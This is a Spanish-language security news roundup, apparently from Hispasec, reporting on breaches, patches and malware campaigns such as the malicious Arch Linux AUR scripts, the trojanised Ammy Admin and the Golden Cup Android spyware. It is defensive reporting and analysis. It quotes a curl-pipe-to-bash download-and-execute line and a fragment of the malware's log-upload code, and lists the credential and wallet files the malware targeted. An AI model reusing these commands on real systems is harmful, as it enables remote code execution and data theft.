Deficiencia en las facturas online de Movistar permite acceder a facturas de otros clientes

FACUA, la ONG que vela por los derechos de los consumidores, ha descubierto un error en el sistema de facturas online que permite a un cliente acceder a facturas de otros clientes cambiando un parámetro de la URL

Nombres, domicilios, líneas fijas y móviles, direcciones de correo electrónico, el desglose de llamadas… Toda esta información era accesible hasta el lunes por la mañana en la web de facturación online de Movistar, si explotabas un error básico de programación. Para ello, era necesario tener línea con esta compañía, y tras identificarse como usuario válido y visitar una factura, era posible acceder a facturas de otros usuarios.

En Hispasec no hemos podido reproducir el error que anuncia FACUA por motivos obvios, pero con la información disponible públicamente es bastante probable que esto fuese posible por usar identificadores predecibles para acceder a una factura. Podemos suponer el siguiente escenario: Un usuario accede a una factura en concreto. La URL de la página que contiene la factura alberga un parámetro que identifica a la factura de forma única (esto se hace para que el servidor devuelva a la web una factura en concreto). Y a partir de aquí, se dan dos errores de programación que permiten que esto ocurra:

  1. Cualquier usuario puede acceder a cualquier factura siempre y cuando sepa su identificador
  2. Los identificadores siguen algún tipo de patrón fácil de descifrar, y que permite conociendo algunos identificadores válidos calcular otros identificadores válidos
Aquí podemos observar la existencia de dos parámetros, ‘title’ con valor ‘Query_string’ y ‘action’ con valor ‘edit’. Extraído de wikipedia.org.

Es fácil imaginar cómo explotar esta vulnerabilidad, una vez explicados ambos fallos de programación. ¿Cuál sería la solución entonces? Lo principal es solucionar el primer punto (cualquier usuario accediendo a cualquier factura), yla solución es comprobar que una factura corresponde al usuario actual antes de enviarla al usuario. Una vez solucionado el primer punto, el segundo punto por sí solo ya no permitiría acceder a datos de otros usuarios. Eso sí, solucionar el segundo punto únicamente sin solucionar el primero podría no ser una solución completa. Aunque no existiese un patrón evidente, todavía se podría intentar generar identificadores válidos por fuerza bruta si el identificador es corto y los caracteres permitidos en el identificador son pocos.

Últimamente la privacidad es un asunto bastante delicado. A finales de mayo de este año terminaba el plazo para implementar el Reglamento General de Protección de Datos (o RGPD) en las empresas españolas, que demasiada gente entendió como “hay que enviar un correo (con la nueva política de privacidad) y ya está”. Pero precisamente lo que quiere evitar el RGPD es filtraciones de datos como ésta, y para eso contempla multas millonarias como castigo a aquellos que no tomasen precauciones suficientes para garantizar los datos personales que manejan.

Muchas veces no se es consciente de la importancia de los datos personales y los daños que puede causar la publicación de éstos. Parece que todavía seguimos infravalorando nuestros datos personales, pero si una compañía filtra tu nombre, tu domicilio, información sobre tu tarjeta de crédito… Es peor que haber perdido la cartera en la calle. Porque tu cartera la puede encontrar un delincuente, y un delincuente se aprovecha. Pero una filtración online la pueden encontrar varios delincuentes, y si encima alguno la publica… Jaque mate.

Más información:
 
FACUA denuncia un agujero de seguridad en la web de Movistar que ha expuesto los datos de sus clientes
https://www.facua.org/es/noticia.php?Id=13007

Actualizaciones para múltiples productos Apple

Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en los productos iOS, macOS, watchOS, tvOS, Safari, e iTunes e iCloud para Windows. Entre todos los productos se corrigen 109 fallos de seguridad.

Los boletines publicados con las actualizaciones y problemas solucionados se resumen a continuación.

El boletín para el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), iOS 11.4.1, resuelve 22 vulnerabilidades relacionadas con múltiples componentes, entre los que se incluyen ‘Wi-Fi’‘Emoji’, el kernel y‘WebKit’ entre otros. Uno de los fallos permitiría a una web maliciosa suplantar la URL mostrada para hacer creer a los usuarios que se encuentran en un sitio web legítimo (CVE-2018-4277, también presente en macOS, watchOS y tvOs).

macOS High Sierra 10.13.6 y los Security Update 2018-004 para Sierra y El Capitán. En este caso se solucionan 11 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘APFS’, ‘ATS’, ‘IOGraphics’, ‘CFNetwork’, ‘CoreCrypto’ y el kernelTres de estas vulnerabilidades podrían permitir elevar privilegios (CVE-2018-4280 y CVE-2018-4285) y/o ejecutar código arbitrario con privilegios de ‘kernel’ (CVE-2018-4268).

Safari 11.1.2 cuenta con otro boletín que soluciona 16 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador. También varios de los errores corregidos permitirían que una web maliciosa suplantase la URL mostrada al usuarios para hacerle creer que se encuentran en un sitio web legítimo(CVE-2018-4260, CVE-2018-4274 y CVE-2018-4279).

El boletín para el sistema operativo de los relojes inteligentes de Apple, watchOS 4.3.2, soluciona 14 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario(CVE-2018-4262, CVE-2018-4264, CVE-2018-4272 y CVE-2018-4284) y la elevación de privilegios (CVE-2018-4280).

tvOS, el sistema operativo de los televisores de la marca, se actualiza a la versión 11.4.1, donde se corrigen 18 vulnerabilidades en múltiples componentes. Ocho de ellas podrían permitir la ejecución remota de código (del CVE-2018-4261 al CVE-2018-4265, CVE-2018-4267, CVE-2018-4272, CVE-2018-4284) y otra elevar privilegios en el sistema (CVE-2018-4280).

Las versiones iTunes 12.8 e iCould 7.6 para Windows corrigen 14 vulnerabilidades cada una, algunas también de gravedad alta.
Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:
 
iOS 11.4.1:

https://support.apple.com/kb/HT208938

macOS High Sierra 10.13.6 y Security Update 2018-004 para Sierra y El Capitán:

Google dará el tiro de gracia a los sitios HTTP en 10 días

El popular navegador Google Chrome marcará como no seguros los sitios web que sirvan su contenido usando HTTP en vez de su versión autenticada y cifrada HTTPS, como parte del esfuerzo de Google de hacer Internet más seguro

A poco que te muevas por Internet, si usas Google Chrome para navegar es bastante posible que éste te haya avisado de que cierto sitio no era seguro. A veces porque el responsable de la web olvidó actualizar el certificado HTTPS (tienen caducidad), otras veces porque la página web envía sin cifrar contraseñas o información de tarjetas de créditos… La cuestión es que te salta un aviso, a veces bastante difícil de esquivar, informándote de que la página no es segura.

Como ya muchos sabréis, HTTP es el protocolo clásico para servir páginas web (que son principalmente contenido HTML) en InternetEl problema de HTTP es que no permite saber si efectivamente quien sirve la web es quien dice ser, y que la información viaja sin cifrar entre el navegador y el servidor. Esto es un problema, ya que permite a un atacante situado entre el navegador y el servidor espiar y modificar el tráfico, entre otros escenarios.

Hace un par de años Google anunció que en enero de 2017 iba a empezar a marcar como no seguros los sitios HTTP que manejase contraseñas e información de tarjetas de crédito. Este fue el primer paso dado por Google hacia un objetivo final: marcar todas las páginasHTTP como no seguras. Las estadísticas que dieron en febrero de este año avalan esta decisión: más de dos tercios del tráfico que pasa por las versiones de Android y Windowsestá protegido, así como más de tres cuartos del de Chrome OS y Mac. También afirman que 81 de los 100 sitios en el top 100 usan HTTPS por defecto.

Para los usuarios, esto no tiene más que ventajas, pero ¿qué pasa con los responsables de las webs? Ya sabemos que la seguridad no suele ser cómoda y que una medida de seguridad es una configuración más, pero hoy en día hay miles de tutoriales para ello, y muchos servicios de creación de páginas web incluyen la opción de activarlo con un solo click. Y si no cuentas con el apoyo de una plataforma, al menos te queda el consuelo de que con iniciativas como Let’s Encrypt te sale gratis.

Amigo webmaster, ya no te quedan excusas.
 

Más información:

 

Roban las claves privadas de un popular monedero de Ethereum a través de la extensión Hola VPN.

Ha sido comprometido el código publicado por Hola VPN en Chrome Web Store añadiendo capacidades para el robo de la clave privada del monedero para la criptomoneda Ethereum MyEtherWallet.
 
 
Según informan en el canal de Twitter del MyEtherWallet, el código fraudulento ha estado disponible 5 horas. Durante esas 5 horas todos los usuarios de Hola VPN que hayan accedido a la web de MyEtherWallet han sufrido el robo de la clave privada de su “wallet” por lo que lo más seguro es que su cartera haya sido sustraída. Es importante conocer que las extensiones de Google Chrome se actualizan automáticamente.
 
Cabe la posibilidad de que el atacante no haya transferido los fondos por lo que lo más recomendable sería que se transfirieran los ETH posiblementes sustraídos a otro wallet alternativo para evitar que el atacante pueda hacerse con el control de ellos.
 
El tema de las extensiones del navegador representa un punto bastante serio en seguridad, las posibilidades que ofrece a un atacante hacerse con el control de una extensión con capacidad de modificar e interactuar con cualquier web que el usuario renderice en su navegador, abre las puertas a los atacantes a usarlas para el robo de casi cualquier credencial electrónica.
 
En este caso ha sido un monedero de Ethereum pero podría haber sido la web de un banco, la cuenta de Netflix o los credenciales de acceso a las cámaras de seguridad de su casa.
Más información:
 

Se propaga una versión maliciosa del software Ammy Admin

Durante los días 13 y 14 de julio la aplicación descargada desde la web oficial del software de control de escritorio remoto Ammy Admin contenía software malicioso.

Se ha verificado que los días señalados, el software gratuito incluía un malware bancario y troyano detectado por ESET como Win32/Kasidet.

Este malware tenía dos objetivos principales:

1. Robar archivos que puedan contener credenciales y/o monederos de criptomonedas. Para ello el software buscaba nombres de archivos que coincidieran con:

  • pass.txt
  • passwords.txt
  • wallet.dat
  • bitcoin

2. Reportar procesos que incluyan alguna de las siguientes características:

  • armoryqt
  • bitcoin
  • exodus
  • electrum
  • jaxx
  • keepass
  • kitty
  • mstsc
  • multibit
  • putty
  • radmin
  • vsphere
  • winscp
  • xshell

La URL del C&C está detectada en VT por 8/67 antivirus:
https://www.virustotal.com/#/url/b2d4d7676b8fd81b257a96adf2a025402148bfae539cb347116bea54bb81fa09/detection

Aunque si verificamos directamente los hashes de las muestras, podemos ver que tienen un ratio de detección mayor al del C&C.

Instaladores:
Servicio:
No es la primera noticia de las que hemos hablado en Una al día sobre alteración de un software legítimo para añadirle contenido malicioso, de hecho, las noticias de los dos últimos días van encaminadas en este sentido, estas noticias son:
Malware hallado en el repositorio AUR de Arch Linux
Roban las claves privadas de un popular monedero de Ethereum a través de la extensión Hola VPN.

Desde Hispasec recomendamos a los usuarios mantener sus antivirus activos y actualizados a la hora de descargar cualquier software. Y, en caso de duda, verificar por algun servicio adicional para asegurarnos que no incluya software malicioso en el código.

Más información:
 
Web oficial de Ammy Admin:

Malware hallado en el repositorio AUR de Arch Linux

Se han hallado varios scripts maliciosos en el repositorio AUR de la distribución Arch Linux.

Arch Linux es una distribución Linux para, en general, usuarios avanzados, sin añadidos (bloatware) y con un modelo de publicación basado en “rolling release” (publicación continua de las versiones más recientes de los paquetes).

Debido a la celeridad en la producción y demanda de paquetes actualizados, la comunidad creó el sistema AUR (Arch User’s Repository) para que fuesen los propios usuarios los que subieran los scripts PKGBUILD. Estos scripts permiten adaptar la compilación e instalación de cualquier código fuente a Arch.

Los tres scripts hallados, con contenido malicioso, son :

acrored 9.5.5-8
balz 1.20-3
minergate 8.1-2

Centrándonos en el script correspondiente a ‘acroread’, vemos el contenido cambiado por el usuario denominado ‘xeactor’:

La línea “curl -s https://ptpb.pw/~x|bash -&” descarga un shell script con curl y seguidamente lo ejecuta. En el momento de escribir estas líneas aun estaba disponible en el servidor, el contenido (por si acaso) era el siguiente:

Instala un servicio que ejecuta cada cierto tiempo el script instalado en ‘/usr/lib/xeactor/u.sh’. Dicho script, a su vez, es descargado del mismo servidor (también disponible cuando esto fue escrito) desde ‘https://ptpb.pw/~u‘ y contenía el siguiente código:

Básicamente, recolecta información de la máquina “infectada” y la envía a pastebin. En efecto, la parte que se ve en rojo es su propia clave privada de pastebin. De hecho ya hay gente que la habría usado para mofarse del creador de este “malware”:

Otros usuarios han comentado en Reddit que “xeactor” podría estar preparando esta infección para minar, debido al historial de ese apodo relacionado con dicha tecnología:

Y en efecto, aunque es una afirmación atrevida, tirando de caché de Google sí se observa dicha relación (reitero, esto no probaría que esa fuese su intención final, pero abre esa posibilidad):

Respecto al sitio donde cuelgan los scripts, https://ptpb.pw/, es un gestor de “pastes”, del estilo del glorioso ‘pastebin’ y similares así como acortador de URLs, por lo que es posible que los scripts hayan sido, simplemente, subidos a esa plataforma sin relación alguna con el atacante. De hecho el método que habría usado es este en concreto:

Vamos a comprobarlo:

No sabremos las intenciones reales de tal usuario, porque el plan parecía de algún modo inacabado. No obstante, de haberlo llevado más lejos, nada le hubiera parado para instalar un minero u otro tipo de malware con mayor carga. Es más, incluso esta parte del código:

FULL_LOG="$(full_log)"
$uploader "$FULL_LOG"
for x in /root /home/*; do
 if [[ -w "$x/compromised.txt" ]]; then
  echo "$FULL_LOG" > "$x/compromised.txt"
 fi
done
exit 0


Deja un archivo con el contenido del log en los directorios /root y todos los /home de la máquina afectada, algo que resulta muy llamativo y evidente y que no dejaría pasar un usuario. Habitualmente, el malware dañino de cuida mucho de dejar esas pistas delante de la víctima, en este caso ni se ha encontrado una carga maliciosa ni oculta del todo sus operaciones. ¿Querría avisar 'xeactor' de la facilidad con la que se puede desatar una infección a los usuarios de Arch Linux? ¿O quizás eran sus intenciones más oscuras y esto solo era una prueba de concepto?
Más información:
 

Golden Cup: el malware espía que aprovecha el Mundial para robar tu información

A lo largo de este año las Fuerzas de Defensa de Israel han sido el objetivo de diferentes campañas de malware espía: familias como “GlanceLove” o “WinkChat” utilizaban técnicas de ingeniería social para sustraer todo tipo de información de los soldados. El pasado 3 de julio, el equipo de ClearSky informaba de una nueva familia de malware para Android dirigida a ciudadanos israelíes.

 

En esta ocasión el malware utiliza la fiebre del Mundial de Rusia para conseguir sus objetivos. La aplicación “Golden Cup“, aparentemente legítima, podía descargarse de Google Play y utilizarse para mostrar en tiempo real los resultados de los partidos. Tras ella se escondía el malware que se descargaba en varias fases con objeto de eludir a los sistemas de seguridad.

Una vez instalada la aplicación se establecía la comunicación con el C&C utilizando el protocolo de transporte MQTT a través del puerto 1883.

Conexión MQTT. Fuente: www.symantec.com

A partir de ahora el malware puede recibir órdenes del servidor de C&C y actualizar el estado del dispositivo.

De forma complementaria se establece una comunicación HTTP, utilizada por el dispositivo para descargar el payload malicioso y para enviar al servidor de C&C la información recopilada. Esto ocurre en dos fases:

Una primera fase en la que se envía información sobre el dispositivo: aplicaciones instaladas, su estado, etc.

Información enviada en la fase 1. Fuente: www.symantec.com

Una segunda fase en la que se descarga otro fichero .dex que implementará varios servicios:

  • ConnManager, para gestionar la conexión con el C&C.
  • ReceiverManager que monitoriza llamadas entrantes e instalaciones de nuevas aplicaciones.
  • TaskManager encargado de gestionar los datos que se van almacenando.
Comandos disponibles en TaskManager. Fuente: www.symantec.com

Como se observa de los comandos que acepta el servicio TaskManager, el virus tiene la capacidad de compartir la ubicación actual, utilizar la cámara y el microfono, además de obtener información sobre los contactos y de otro tipo.

En Koodous podemos encontrar algunas muestras

Otros IOCs:

Nombres de paquete:

  • anew.football.cup.world.com.worldcup
  • com.coder.glancelove
  • com.winkchat

Hash del fichero DEX:

  • afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e

Dominios e IP:

  • goldncup[.]com
  • glancelove[.]com
  • autoandroidup[.]website
  • mobilestoreupdate[.]website
  • updatemobapp[.]website
  • 107[.]175[.]144[.]26
  • 192[.]64[.]114[.]147
Más información:
 
Infrastructure and Samples of Hamas’ Android Malware Targeting Israeli Soldiers
https://www.clearskysec.com/glancelove/

Hamas Uses Fake Facebook Profiles to Target Israeli Soldiers
https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/

Detectadas graves vulnerabilidades en dispositivos SCADA Siemens SICLOCK

En un reciente reporte de la multinacional Siemens, se alerta de graves vulnerabilidades remotas presentes en los dispositivos de control de planta SICLOCK TC que, dada su antigüedad, no van a ser actualizados, siendo necesario aplicar las contramedidas publicadas.

Los dispositivos Siemens SCADA, pertenecientes a la familia SICLOCK TC, se utilizan para proporcionar un sistema de sincronización de la hora dentro de una central de pequeña o mediana escala, en caso que el dispositivo principal fallase.

Las vulnerabilidades reportadas afectarían a los dispositivos SICLOCK TC100 y TC400, en todas sus versiones. Según el reporte facilitado, se habrían detectado 6 vulnerabilidades, como denegaciones de servicio, salto de restricciones de autenticación o modificación del firmware, siendo el listado completo el siguiente:

CVE-2018-4851 – Denegación de servicio.
CVE-2018-4852 – Salto de restricciones del sistema de autenticación.
CVE-2018-4853 – Modificación del firmware del dispositivo a través del puerto UDP 69.
CVE-2018-4854 – Modificación del cliente de administración presente en el dispositivo a través del puerto UDP 69. Un atacante podría de esta manera ejecutar código en el sistema del cliente que utilice una versión modificada.
CVE-2018-4855 – Revelación de credenciales sin cifrar, tanto en los ficheros de configuración, como durante el tráfico de red, permitiendo a un atacante con acceso obtener los credenciales de forma sencilla.
CVE-2018-4856 – Un atacante con permisos administrativos podría bloquear usuarios ya registrados en el dispositivo. Sólo mediante el acceso físico al dispositivo se podrían revertir los cambios.

Aunque no se han detectado ataques o exploits públicos que reproduzcan estas vulnerabilidades, Siemens ha proporcionado las contramedidas necesarias para proteger los dispositivos de estos ataques.
Al encontrarse estos dispositivos en el fin de ciclo de soporte, no se van a publicar actualizaciones de firmware por el momento, según el fabricante.

 

Más información:
 
SSA-197012: Vulnerabilities in SICLOCK central plant clocks

Stylish: La extensión del navegador que se queda con lo que visitas

Una extensión para los navegadores Google Chrome y Mozilla Firefox dedicada a modificar la apariencia de las webs, conocida como Stylish, se dedicaba a mandar lo visitado por el usuario a servidores de SimilarWeb, la empresa detrás de ésta

“De buen gusto”, dice la página de diccionarios en línea WordReference.com que significa “stylish“, entre otras acepciones. La verdad es que de buen gusto no se puede decir que haya sido lo que ha hecho SimilarWeb, la empresa detrás de esta famosa extensión. Y no decimos “famosa” como manida coletilla periodística, estamos hablando de la que ha sidola extensión de referencia con su funcionalidad: permitir especificar hojas de estilo personalizadas para modificar la apariencia de una web. Los datos: cerca de dos millones de usuarios en Google Chrome, y casi trescientos mil en Mozilla Firefox. Datos extraídos gracias a la caché de Google, ya que ambas versiones han desaparecido de las páginas de Chrome y Firefox.

La mecánica del espionaje es sencilla: Este tipo de extensiones necesitan acceder a laURL del navegador para saber si está en una página a la que debe aplicar una hoja de estilos personalizada. Y ya que accedes a la URL, pues te la quedas y la envías a tus servidores, que hay empresas que compran el historial de visitas de la gente… ¿Qué hay de malo en ésto? Bueno, éstas empresas estudian los hábitos de navegación de la gente, y de las peores cosas que pueden hacer dentro de la legalidad es venderle a otra empresa que a una persona en concreto le gustan los nomos de jardín. Así, esa última empresa como anunciante en Internet te puede bombardear con publicidad sobre unos nomos chulísimos cada vez que pases por una página que contiene anuncios gestionados por esa empresa.

En realidad, que Stylish se dedicase a esos menesteres no es una novedad. Cuando fue comprado a un desarrollador independiente por SimilarWeb en enero de 2017, ésta anunció que iba a recopilar ciertos datos “anónimos” sobre los usuarios. De hecho, ese mismo mes se publicó un artículo avisando de este cambio en la política de privacidad, donde se comentaba que efectivamente se obtenía información sobre los sitios que se visitaban. Lo que pasa es que a veces es necesario escribir un artículo incendiariocomo el de Robert Heaton, con capturas de pantalla donde se ve claramente cómo mandan esa información a los servidores de SimilarWeb:

Extraída de robertheaton.com

Como ya comentábamos en otra Una-al-díaexisten distintos tipos de datos personales, y los que probablemente recopila SimilarWeb son datos personales despersonalizados. Es decir, datos personales que conforman un perfil, pero que no se asocian directamente a una persona. El problema es que es demasiado fácil, a pesar de recopilarlos sin identificar a la persona en concreto, terminar vinculándolos a una. Y es que como dice Robert Heaton en su artículo, si saben que alguien está visitando https://www.linkedin.com/in/<NOMBRE_DE_USUARIO>/edit/ (página visitada por un usuario para modificar su perfil), ¿quién podrá ser ese usuario? Guiño, guiño.

En definitiva, se dice que “si un servicio es gratis, el producto eres tú”, y este es otro caso más. Otra de las acepciones de “stylish” según WordReference.com es “a la moda, que también hace justicia al concepto recopilar datos personales para luego venderlos: está de moda. Y lo que nos queda.

Más información:
 
“Stylish” browser extension steals all your internet history
https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

Major Stylish add-on changes in regards to privacy
https://www.ghacks.net/2017/01/04/major-stylish-add-on-changes-in-regards-to-privacy/

Vulnerabilidades en iDRAC – PowerEdge Dell EMC

El equipo de seguridad de Dell a corregido 4 vulnerabilidades que pueden ser explotadas por usuarios maliciosos en iDRAC.

¿Qué es iDRAC?

Integrated Dell Remote Access Controller‘ (iDRAC) permite implementar, actualizar, supervisar y mantener los servidores Dell PowerEdge con o sin un agente de software de administración de sistemas. Se encuentra integrado dentro del servidor por lo que iDRAC no requiere de un sistema operativo o un hipervisor para funcionar.

iDRAC ofrece al administrador un panel intuitivo para supervisar el sistema
Visión global del sistema

Simplifica las tareas de administración del ciclo de vida del servidor, como el aprovisionamiento, implementación, mantenimiento, instalación de parches y actualizaciones.

Algunas de sus funciones:

  • Energía: Los administradores entre otras cosas pueden en caso de bloqueo del sistema realizar un reinicio del servidor.
  • Consola: EL administrador puede interactuar con el servidor a través de la consola remota, evitando estar físicamente delante de la máquina en caso de perder la conexión con el sistema operativo.
  • Medios virtuales: Permite montar imágenes de disco compartidas en red.

También permite supervisar la temperatura, ventiladores y los eventos del sistema.

La consola web de iDRAC9 permite supervisar los eventos del sistema
Supervisión de logs en iDRAC9

Vulnerabilidades reportadas:


CVE-2018-1249

Las versiones de Dell EMC iDRAC9 anteriores a 3.21.21.21 no exigen el uso de TLS/SSL para establecer la conexión con el servidor web de iDRAC en ciertas URLs. Un atacante podría explotar esta vulnerabilidad para realizar un ataque ‘mitm‘ (man-in-the-middle) y evitar que el cliente establezca una conexión cifrada con el servidor.

https://nvd.nist.gov/vuln/detail/CVE-2018-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1249


CVE-2018-1244

Tanto las versiones anteriores a 2.60.60.60 de Dell EMC iDRAC7/iDRAC8 como 3.21.21.21 de iDRAC9 contienen una vulnerabilidad de inyección de comandos en el agente SNMP. Un atacante autenticado podría aprovechar esta vulnerabilidad para ejecutar comandos arbitrarios en iDRAC, donde las alertas de SNMP están habilitadas.

https://nvd.nist.gov/vuln/detail/CVE-2018-1244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1244


CVE-2018-1212

La consola de diagnóstico web en Dell EMC iDRAC6 (todas las versiones modulares) contiene una vulnerabilidad de inyección de comandos. Un usuario malicioso autenticado de forma remota con acceso a la consola de diagnóstico podría explotar esta vulnerabilidad para ejecutar comandos arbitrarios como root en el sistema que no se encuentre actualizado.

https://nvd.nist.gov/vuln/detail/CVE-2018-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1212


CVE-2018-1243

Las versiones anteriores a 2.91 de iDRAC6, 2.60.60.60 en iDRAC7/iDRAC8, así como 3.21.21.21 en iDRAC9, contienen una vulnerabilidad de ID de sesión CGI débil. Las sesiones invocadas a través de binarios CGI utilizan valores de 96 bits, lo que facilita a los atacantes remotos realizar ataques de fuerza bruta.

https://nvd.nist.gov/vuln/detail/CVE-2018-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1243


Breve introducción donde se pueden apreciar algunas funciones de iDRAC9

Dell ya ha publicado un documento de soporte para solucionar las vulnerabilidades comentadas anteriormente, así como consejos para mantener al día el firmware de iDRAC.